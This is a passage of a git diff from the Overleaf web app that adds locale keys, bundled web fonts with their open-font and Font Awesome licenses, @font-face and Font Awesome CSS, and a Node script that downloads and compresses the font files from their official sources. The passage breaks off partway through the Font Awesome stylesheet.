"you_have_1_license_and_your_plan_supports_up_to_y": "", + "you_have_added_x_of_group_size_y": "", + "you_have_been_invited_to_transfer_management_of_your_account": "", + "you_have_been_invited_to_transfer_management_of_your_account_to": "", + "you_have_been_removed_from_this_project_and_will_be_redirected_to_project_dashboard": "", + "you_have_x_licenses_and_your_plan_supports_up_to_y": "", + "you_have_x_licenses_on_your_subscription": "", + "you_need_to_configure_your_sso_settings": "", + "you_unpaused_your_subscription": "", + "you_will_be_able_to_reassign_subscription": "", + "youll_get_best_results_in_visual_but_can_be_used_in_source": "", + "youll_need_to_ask_the_github_repository_owner": "", + "youll_no_longer_need_to_remember_credentials": "", + "your_account_is_managed_by_admin_cant_join_additional_group": "", + "your_account_is_managed_by_your_group_admin": "", + "your_add_on_has_been_cancelled_and_will_remain_active_until_your_billing_cycle_ends_on": "", + "your_affiliation_is_confirmed": "", + "your_browser_does_not_support_this_feature": "", + "your_changes_will_save": "", + "your_compile_timed_out": "", + "your_current_plan": "", + "your_current_plan_gives_you": "", + "your_current_plan_supports_up_to_x_licenses": "", + "your_current_project_will_revert_to_the_version_from_time": "", + "your_git_access_info": "", + "your_git_access_info_bullet_1": "", + "your_git_access_info_bullet_2": "", + "your_git_access_info_bullet_3": "", + "your_git_access_info_bullet_4": "", + "your_git_access_info_bullet_5": "", + "your_git_access_tokens": "", + "your_message_to_collaborators": "", + "your_name_and_email_address_will_be_visible_to_the_project_owner_and_other_editors": "", + "your_new_plan": "", + "your_password_was_detected": "", + "your_plan": "", + "your_plan_is_changing_at_term_end": "", + "your_plan_is_limited_to_n_editors": "", + "your_plan_is_limited_to_n_editors_plural": "", + "your_premium_plan_is_paused": "", + "your_project_exceeded_collaborator_limit": "", + "your_project_exceeded_compile_timeout_limit_on_free_plan": "", + "your_project_near_compile_timeout_limit": "", + "your_project_need_more_time_to_compile": "", + "your_projects": "", + "your_role": "", + "your_subscription": "", + "your_subscription_has_expired": "", + "your_subscription_will_pause_on": "", + "your_subscription_will_pause_on_short": "", + "youre_a_member_of_overleaf_labs": "", + "youre_about_to_disable_single_sign_on": "", + "youre_about_to_enable_single_sign_on": "", + "youre_about_to_enable_single_sign_on_sso_only": "", + "youre_adding_x_licenses_to_your_plan_giving_you_a_total_of_y_licenses": "", + "youre_already_setup_for_sso": "", + "youre_helping_us_shape_the_future_of_overleaf": "", + "youre_joining": "", + "youre_on_free_trial_which_ends_on": "", + "youre_signed_in_as_logout": "", + "youve_added_more_licenses": "", + "youve_added_x_more_licenses_to_your_subscription_invite_people": "", + "youve_lost_collaboration_access": "", + "youve_paused_your_subscription": "", + "youve_unlinked_all_users": "", + "youve_upgraded_your_plan": "", + "zoom_in": "", + "zoom_out": "", + "zoom_to": "", + "zotero_dynamic_sync_description": "", + "zotero_groups_loading_error": "", + "zotero_groups_relink": "", + "zotero_integration": "", + "zotero_is_premium": "", + "zotero_reference_loading_error": "", + "zotero_reference_loading_error_expired": "", + "zotero_reference_loading_error_forbidden": "", + "zotero_sync_description": "", + "zotero_upgrade_prompt_content": "", + "zotero_upgrade_prompt_title": "" +} diff --git a/services/web/frontend/fonts/README.md b/services/web/frontend/fonts/README.md new file mode 100644 index 0000000..c07309c --- /dev/null +++ b/services/web/frontend/fonts/README.md @@ -0,0 +1,13 @@ +This directory contains fonts used by the Overleaf web application. + +* [DM Mono](https://github.com/googlefonts/dm-mono) +* [Font Awesome](https://fontawesome.com/v4/) +* [Lato](https://www.latofonts.com/) +* [Material Symbols](https://github.com/google/material-design-icons) +* [Merriweather](https://github.com/SorkinType/Merriweather) +* [Noto Sans](https://notofonts.github.io/#latin-greek-cyrillic) +* [Noto Serif](https://notofonts.github.io/#latin-greek-cyrillic) +* [OpenDyslexic Mono](https://github.com/antijingoist/opendyslexic/tree/master) +* [Open Sans](https://github.com/googlefonts/opensans) +* [Source Code Pro](https://github.com/adobe-fonts/source-code-pro) +* [STIX Two Math](https://github.com/stipub/stixfonts/) diff --git a/services/web/frontend/fonts/STIXTwoMath/OFL.txt b/services/web/frontend/fonts/STIXTwoMath/OFL.txt new file mode 100644 index 0000000..11b7b8e --- /dev/null +++ b/services/web/frontend/fonts/STIXTwoMath/OFL.txt @@ -0,0 +1,92 @@ +Copyright 2001-2021 The STIX Fonts Project Authors (https://github.com/stipub/stixfonts), with Reserved Font Name "TM Math". STIX Fonts™ is a trademark of The Institute of Electrical and Electronics Engineers, Inc. + +This Font Software is licensed under the SIL Open Font License, Version 1.1. +This license is copied below, and is also available with a FAQ at: +http://scripts.sil.org/OFL + +----------------------------------------------------------- +SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 +----------------------------------------------------------- + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font creation +efforts of academic and linguistic communities, and to provide a free and +open framework in which fonts may be shared and improved in partnership +with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. The +requirement for fonts to remain under this license does not apply +to any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software components as +distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, deleting, +or substituting -- in part or in whole -- any of the components of the +Original Version, by changing formats or by porting the Font Software to a +new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, modify, +redistribute, and sell modified and unmodified copies of the Font +Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, +in Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the corresponding +Copyright Holder. This restriction only applies to the primary font name as +presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created +using the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. diff --git a/services/web/frontend/fonts/STIXTwoMath/STIXTwoMath-Regular.woff2 b/services/web/frontend/fonts/STIXTwoMath/STIXTwoMath-Regular.woff2 new file mode 100644 index 0000000..3b97c9c Binary files /dev/null and b/services/web/frontend/fonts/STIXTwoMath/STIXTwoMath-Regular.woff2 differ diff --git a/services/web/frontend/fonts/STIXTwoMath/stix-two-math.css b/services/web/frontend/fonts/STIXTwoMath/stix-two-math.css new file mode 100644 index 0000000..25ed725 --- /dev/null +++ b/services/web/frontend/fonts/STIXTwoMath/stix-two-math.css @@ -0,0 +1,4 @@ +@font-face { + font-family: 'Stix Two Math'; + src: url('STIXTwoMath-Regular.woff2') format('woff2'); +} diff --git a/services/web/frontend/fonts/build-fonts.mjs b/services/web/frontend/fonts/build-fonts.mjs new file mode 100644 index 0000000..8387509 --- /dev/null +++ b/services/web/frontend/fonts/build-fonts.mjs @@ -0,0 +1,194 @@ +import fs from 'node:fs/promises' +import { createWriteStream } from 'node:fs' +import { basename, join } from 'node:path' +import { tmpdir } from 'node:os' +import { execSync } from 'node:child_process' +import yauzl from 'yauzl' + +// brew install woff2 + +const families = [ + { + folder: 'dm-mono', + url: 'https://github.com/googlefonts/dm-mono', + fonts: [ + 'https://github.com/googlefonts/dm-mono/raw/refs/heads/main/exports/DMMono-Italic.ttf', + 'https://github.com/googlefonts/dm-mono/raw/refs/heads/main/exports/DMMono-Medium.ttf', + 'https://github.com/googlefonts/dm-mono/raw/refs/heads/main/exports/DMMono-MediumItalic.ttf', + 'https://github.com/googlefonts/dm-mono/raw/refs/heads/main/exports/DMMono-Regular.ttf', + ], + }, + { + folder: 'font-awesome', + url: 'https://fontawesome.com/v4/', + archive: 'https://fontawesome.com/v4/assets/font-awesome-4.7.0.zip', + fonts: ['font-awesome-4.7.0/fonts/fontawesome-webfont.woff2'], + }, + { + folder: 'lato', + url: 'https://www.latofonts.com/', + archive: 'https://www.latofonts.com/download/lato2oflweb-zip/', + fonts: [ + 'Lato2OFLWeb/LatoLatin/fonts/LatoLatin-Bold.woff2', + 'Lato2OFLWeb/LatoLatin/fonts/LatoLatin-BoldItalic.woff2', + 'Lato2OFLWeb/LatoLatin/fonts/LatoLatin-Italic.woff2', + 'Lato2OFLWeb/LatoLatin/fonts/LatoLatin-Regular.woff2', + ], + }, + { + folder: 'merriweather', + url: 'https://github.com/SorkinType/Merriweather', + fonts: [ + 'https://github.com/SorkinType/Merriweather/raw/refs/heads/master/fonts/webfonts/Merriweather-Bold.woff2', + 'https://github.com/SorkinType/Merriweather/raw/refs/heads/master/fonts/webfonts/Merriweather-BoldItalic.woff2', + 'https://github.com/SorkinType/Merriweather/raw/refs/heads/master/fonts/webfonts/Merriweather-Italic.woff2', + 'https://github.com/SorkinType/Merriweather/raw/refs/heads/master/fonts/webfonts/Merriweather-Regular.woff2', + ], + license: + 'https://github.com/SorkinType/Merriweather/raw/refs/heads/master/OFL.txt', + }, + { + folder: 'noto-sans', + url: 'https://notofonts.github.io/#latin-greek-cyrillic', + fonts: [ + 'https://github.com/notofonts/notofonts.github.io/raw/refs/heads/main/fonts/NotoSans/full/ttf/NotoSans-Italic.ttf', + 'https://github.com/notofonts/notofonts.github.io/raw/refs/heads/main/fonts/NotoSans/full/ttf/NotoSans-Medium.ttf', + 'https://github.com/notofonts/notofonts.github.io/raw/refs/heads/main/fonts/NotoSans/full/ttf/NotoSans-MediumItalic.ttf', + 'https://github.com/notofonts/notofonts.github.io/raw/refs/heads/main/fonts/NotoSans/full/ttf/NotoSans-Regular.ttf', + 'https://github.com/notofonts/notofonts.github.io/raw/refs/heads/main/fonts/NotoSans/full/ttf/NotoSans-SemiBold.ttf', + 'https://github.com/notofonts/notofonts.github.io/raw/refs/heads/main/fonts/NotoSans/full/ttf/NotoSans-SemiBoldItalic.ttf', + ], + license: + 'https://raw.githubusercontent.com/notofonts/latin-greek-cyrillic/refs/heads/main/OFL.txt', + }, + { + folder: 'noto-serif', + url: 'https://notofonts.github.io/#latin-greek-cyrillic', + fonts: [ + 'https://github.com/notofonts/notofonts.github.io/raw/refs/heads/main/fonts/NotoSerif/unhinted/slim-variable-ttf/NotoSerif%5Bwght%5D.ttf', + 'https://github.com/notofonts/notofonts.github.io/raw/refs/heads/main/fonts/NotoSerif/unhinted/slim-variable-ttf/NotoSerif-Italic%5Bwght%5D.ttf', + ], + license: + 'https://raw.githubusercontent.com/notofonts/latin-greek-cyrillic/refs/heads/main/OFL.txt', + }, + { + folder: 'open-dyslexic-mono', + url: 'https://github.com/antijingoist/opendyslexic', + fonts: [ + 'https://github.com/antijingoist/open-dyslexic/blob/master/otf/OpenDyslexicMono-Regular.otf', + ], + license: 'https://github.com/antijingoist/opendyslexic/blob/master/OFL.txt', + }, + { + folder: 'open-sans', + url: 'https://github.com/googlefonts/opensans', + fonts: [ + 'https://github.com/googlefonts/opensans/raw/refs/heads/main/fonts/ttf/OpenSans-Bold.ttf', + 'https://github.com/googlefonts/opensans/raw/refs/heads/main/fonts/ttf/OpenSans-Light.ttf', + 'https://github.com/googlefonts/opensans/raw/refs/heads/main/fonts/ttf/OpenSans-Regular.ttf', + 'https://github.com/googlefonts/opensans/raw/refs/heads/main/fonts/ttf/OpenSans-SemiBold.ttf', + ], + license: + 'https://raw.githubusercontent.com/googlefonts/opensans/refs/heads/main/OFL.txt', + }, + { + folder: 'source-code-pro', + url: 'https://github.com/adobe-fonts/source-code-pro', + fonts: [ + 'https://github.com/adobe-fonts/source-code-pro/raw/refs/heads/release/WOFF2/TTF/SourceCodePro-Regular.ttf.woff2', + ], + license: + 'https://raw.githubusercontent.com/adobe-fonts/source-code-pro/refs/heads/release/LICENSE.md', + }, + { + folder: 'STIXTwoMath', + url: 'https://github.com/stipub/stixfonts', + fonts: [ + 'https://github.com/stipub/stixfonts/raw/refs/heads/master/fonts/static_otf_woff2/STIXTwoMath-Regular.woff2', + ], + license: + 'https://raw.githubusercontent.com/stipub/stixfonts/refs/heads/master/OFL.txt', + }, +] + +const fetchFile = async (url, path) => { + console.log(`${url}\n${path}`) + const response = await fetch(url) + if (!response.ok) { + throw new Error(response.statusText) + } + await fs.writeFile(path, response.body) +} + +for (const family of families) { + if (!family.folder) { + throw new Error('Missing family information') + } + + await fs.mkdir(family.folder, { recursive: true }) + + const fonts = new Set(family.fonts) + + if (family.archive) { + const dir = await fs.mkdtemp(join(tmpdir(), 'fonts-')) + const filename = decodeURIComponent(basename(family.archive)) + const path = `${dir}/${filename}` + await fetchFile(family.archive, path) + + await new Promise((resolve, reject) => { + yauzl.open(path, { lazyEntries: true }, (err, zipfile) => { + if (err) { + reject(err) + } else { + zipfile.on('entry', entry => { + if (fonts.has(entry.fileName)) { + console.log(entry.fileName) + zipfile.openReadStream(entry, (err, readStream) => { + if (err) { + reject(err) + } else { + const path = `${family.folder}/${basename(entry.fileName)}` + const output = createWriteStream(path) + readStream.on('end', async () => { + output.close() + if (path.endsWith('.ttf')) { + execSync(`woff2_compress "${path}"`) + await fs.unlink(path) + } + zipfile.readEntry() + }) + readStream.pipe(output) + } + }) + } else { + zipfile.readEntry() + } + }) + zipfile.on('error', reject) + zipfile.on('end', resolve) + zipfile.readEntry() + } + }) + }) + + await fs.unlink(path) + } else { + for (const url of fonts) { + const filename = decodeURIComponent(basename(url)) + const path = `${family.folder}/${filename}` + await fetchFile(url, path) + + if (path.endsWith('.ttf')) { + execSync(`woff2_compress "${path}"`) + await fs.unlink(path) + } + } + } + + if (family.license) { + const url = family.license + const filename = decodeURIComponent(basename(url)) + const path = `${family.folder}/${filename}` + await fetchFile(url, path) + } +} diff --git a/services/web/frontend/fonts/dm-mono/DMMono-Italic.woff2 b/services/web/frontend/fonts/dm-mono/DMMono-Italic.woff2 new file mode 100644 index 0000000..404632f Binary files /dev/null and b/services/web/frontend/fonts/dm-mono/DMMono-Italic.woff2 differ diff --git a/services/web/frontend/fonts/dm-mono/DMMono-Medium.woff2 b/services/web/frontend/fonts/dm-mono/DMMono-Medium.woff2 new file mode 100644 index 0000000..aa5f78d Binary files /dev/null and b/services/web/frontend/fonts/dm-mono/DMMono-Medium.woff2 differ diff --git a/services/web/frontend/fonts/dm-mono/DMMono-MediumItalic.woff2 b/services/web/frontend/fonts/dm-mono/DMMono-MediumItalic.woff2 new file mode 100644 index 0000000..c89c978 Binary files /dev/null and b/services/web/frontend/fonts/dm-mono/DMMono-MediumItalic.woff2 differ diff --git a/services/web/frontend/fonts/dm-mono/DMMono-Regular.woff2 b/services/web/frontend/fonts/dm-mono/DMMono-Regular.woff2 new file mode 100644 index 0000000..2e26b5a Binary files /dev/null and b/services/web/frontend/fonts/dm-mono/DMMono-Regular.woff2 differ diff --git a/services/web/frontend/fonts/dm-mono/OFL.txt b/services/web/frontend/fonts/dm-mono/OFL.txt new file mode 100644 index 0000000..01450af --- /dev/null +++ b/services/web/frontend/fonts/dm-mono/OFL.txt @@ -0,0 +1,93 @@ +Copyright 2020 The DM Mono Project Authors (https://www.github.com/googlefonts/dm-mono) + +This Font Software is licensed under the SIL Open Font License, Version 1.1. +This license is copied below, and is also available with a FAQ at: +http://scripts.sil.org/OFL + + +----------------------------------------------------------- +SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 +----------------------------------------------------------- + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font creation +efforts of academic and linguistic communities, and to provide a free and +open framework in which fonts may be shared and improved in partnership +with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. The +requirement for fonts to remain under this license does not apply +to any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software components as +distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, deleting, +or substituting -- in part or in whole -- any of the components of the +Original Version, by changing formats or by porting the Font Software to a +new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, modify, +redistribute, and sell modified and unmodified copies of the Font +Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, +in Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the corresponding +Copyright Holder. This restriction only applies to the primary font name as +presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created +using the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. diff --git a/services/web/frontend/fonts/dm-mono/dm-mono.css b/services/web/frontend/fonts/dm-mono/dm-mono.css new file mode 100644 index 0000000..44c1828 --- /dev/null +++ b/services/web/frontend/fonts/dm-mono/dm-mono.css @@ -0,0 +1,31 @@ +@font-face { + font-family: 'DM Mono'; + font-style: normal; + font-weight: 400; + font-display: fallback; + src: url('DMMono-Regular.woff2') format('woff2'); +} + +@font-face { + font-family: 'DM Mono'; + font-style: italic; + font-weight: 400; + font-display: fallback; + src: url('DMMono-Italic.woff2') format('woff2'); +} + +@font-face { + font-family: 'DM Mono'; + font-style: normal; + font-weight: 500; + font-display: fallback; + src: url('DMMono-Medium.woff2') format('woff2'); +} + +@font-face { + font-family: 'DM Mono'; + font-style: italic; + font-weight: 500; + font-display: fallback; + src: url('DMMono-MediumItalic.woff2') format('woff2'); +} diff --git a/services/web/frontend/fonts/font-awesome/LICENSE.txt b/services/web/frontend/fonts/font-awesome/LICENSE.txt new file mode 100644 index 0000000..e69c5e3 --- /dev/null +++ b/services/web/frontend/fonts/font-awesome/LICENSE.txt @@ -0,0 +1,165 @@ +Fonticons, Inc. (https://fontawesome.com) + +-------------------------------------------------------------------------------- + +Font Awesome Free License + +Font Awesome Free is free, open source, and GPL friendly. You can use it for +commercial projects, open source projects, or really almost whatever you want. +Full Font Awesome Free license: https://fontawesome.com/license/free. + +-------------------------------------------------------------------------------- + +# Icons: CC BY 4.0 License (https://creativecommons.org/licenses/by/4.0/) + +The Font Awesome Free download is licensed under a Creative Commons +Attribution 4.0 International License and applies to all icons packaged +as SVG and JS file types. + +-------------------------------------------------------------------------------- + +# Fonts: SIL OFL 1.1 License + +In the Font Awesome Free download, the SIL OFL license applies to all icons +packaged as web and desktop font files. + +Copyright (c) 2024 Fonticons, Inc. (https://fontawesome.com) +with Reserved Font Name: "Font Awesome". + +This Font Software is licensed under the SIL Open Font License, Version 1.1. +This license is copied below, and is also available with a FAQ at: +http://scripts.sil.org/OFL + +SIL OPEN FONT LICENSE +Version 1.1 - 26 February 2007 + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font creation +efforts of academic and linguistic communities, and to provide a free and +open framework in which fonts may be shared and improved in partnership +with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. The +requirement for fonts to remain under this license does not apply +to any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software components as +distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, deleting, +or substituting — in part or in whole — any of the components of the +Original Version, by changing formats or by porting the Font Software to a +new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, modify, +redistribute, and sell modified and unmodified copies of the Font +Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, +in Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the corresponding +Copyright Holder. This restriction only applies to the primary font name as +presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created +using the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. + +-------------------------------------------------------------------------------- + +# Code: MIT License (https://opensource.org/licenses/MIT) + +In the Font Awesome Free download, the MIT license applies to all non-font and +non-icon files. + +Copyright 2024 Fonticons, Inc. + +Permission is hereby granted, free of charge, to any person obtaining a copy of +this software and associated documentation files (the "Software"), to deal in the +Software without restriction, including without limitation the rights to use, copy, +modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, +and to permit persons to whom the Software is furnished to do so, subject to the +following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, +INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A +PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT +HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION +OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +-------------------------------------------------------------------------------- + +# Attribution + +Attribution is required by MIT, SIL OFL, and CC BY licenses. Downloaded Font +Awesome Free files already contain embedded comments with sufficient +attribution, so you shouldn't need to do anything additional when using these +files normally. + +We've kept attribution comments terse, so we ask that you do not actively work +to remove them from files, especially code. They're a great way for folks to +learn about Font Awesome. + +-------------------------------------------------------------------------------- + +# Brand Icons + +All brand icons are trademarks of their respective owners. The use of these +trademarks does not indicate endorsement of the trademark holder by Font +Awesome, nor vice versa. **Please do not use brand logos for any purpose except +to represent the company, product, or service to which they refer.** diff --git a/services/web/frontend/fonts/font-awesome/font-awesome.css b/services/web/frontend/fonts/font-awesome/font-awesome.css new file mode 100644 index 0000000..602f34f --- /dev/null +++ b/services/web/frontend/fonts/font-awesome/font-awesome.css @@ -0,0 +1,2334 @@ +/*! + * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome + * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) + */ +@font-face { + font-family: 'FontAwesome'; + src: url('fontawesome-webfont.woff2') format('woff2'); + font-weight: normal; + font-style: normal; +} +.fa { + display: inline-block; + font: normal normal normal 14px/1 FontAwesome; + font-size: inherit; + text-rendering: auto; + -webkit-font-smoothing: antialiased; + -moz-osx-font-smoothing: grayscale; +} +/* makes the font 33% larger relative to the icon container */ +.fa-lg { + font-size: 1.33333333em; + line-height: 0.75em; + vertical-align: -15%; +} +.fa-2x { + font-size: 2em; +} +.fa-3x { + font-size: 3em; +} +.fa-4x { + font-size: 4em; +} +.fa-5x { + font-size: 5em; +} +.fa-fw { + width: 1.28571429em; + text-align: center; +} +.fa-ul { + padding-left: 0; + margin-left: 2.14285714em; + list-style-type: none; +} +.fa-ul > li { + position: relative; +} +.fa-li { + position: absolute; + left: -2.14285714em; + width: 2.14285714em; + top: 0.14285714em; + text-align: center; +} +.fa-li.fa-lg { + left: -1.85714286em; +} +.fa-border { + padding: 0.2em 0.25em 0.15em; + border: solid 0.08em #eeeeee; + border-radius: 0.1em; +} +.fa-pull-left { + float: left; +} +.fa-pull-right { + float: right; +} +.fa.fa-pull-left { + margin-right: 0.3em; +} +.fa.fa-pull-right { + margin-left: 0.3em; +} +/* Deprecated as of 4.4.0 */ +.pull-right { + float: right; +} +.pull-left { + float: left; +} +.fa.pull-left { + margin-right: 0.3em; +} +.fa.pull-right { + margin-left: 0.3em; +} +.fa-spin { + -webkit-animation: fa-spin 2s infinite linear; + animation: fa-spin 2s infinite linear; +} +.fa-pulse { + -webkit-animation: fa-spin 1s infinite steps(8); + animation: fa-spin 1s infinite steps(8); +} +@-webkit-keyframes fa-spin { + 0% { + -webkit-transform: rotate(0deg); + transform: rotate(0deg); + } + 100% { + -webkit-transform: rotate(359deg); + transform: rotate(359deg); + } +} +@keyframes fa-spin { + 0% { + -webkit-transform: rotate(0deg); + transform: rotate(0deg); + } + 100% { + -webkit-transform: rotate(359deg); + transform: rotate(359deg); + } +} +.fa-rotate-90 { + -ms-filter: 'progid:DXImageTransform.Microsoft.BasicImage(rotation=1)'; + -webkit-transform: rotate(90deg); + -ms-transform: rotate(90deg); + transform: rotate(90deg); +} +.fa-rotate-180 { + -ms-filter: 'progid:DXImageTransform.Microsoft.BasicImage(rotation=2)'; + -webkit-transform: rotate(180deg); + -ms-transform: rotate(180deg); + transform: rotate(180deg); +} +.fa-rotate-270 { + -ms-filter: 'progid:DXImageTransform.Microsoft.BasicImage(rotation=3)'; + -webkit-transform: rotate(270deg); + -ms-transform: rotate(270deg); + transform: rotate(270deg); +} +.fa-flip-horizontal { + -ms-filter: 'progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)'; + -webkit-transform: scale(-1, 1); + -ms-transform: scale(-1, 1); + transform: scale(-1, 1); 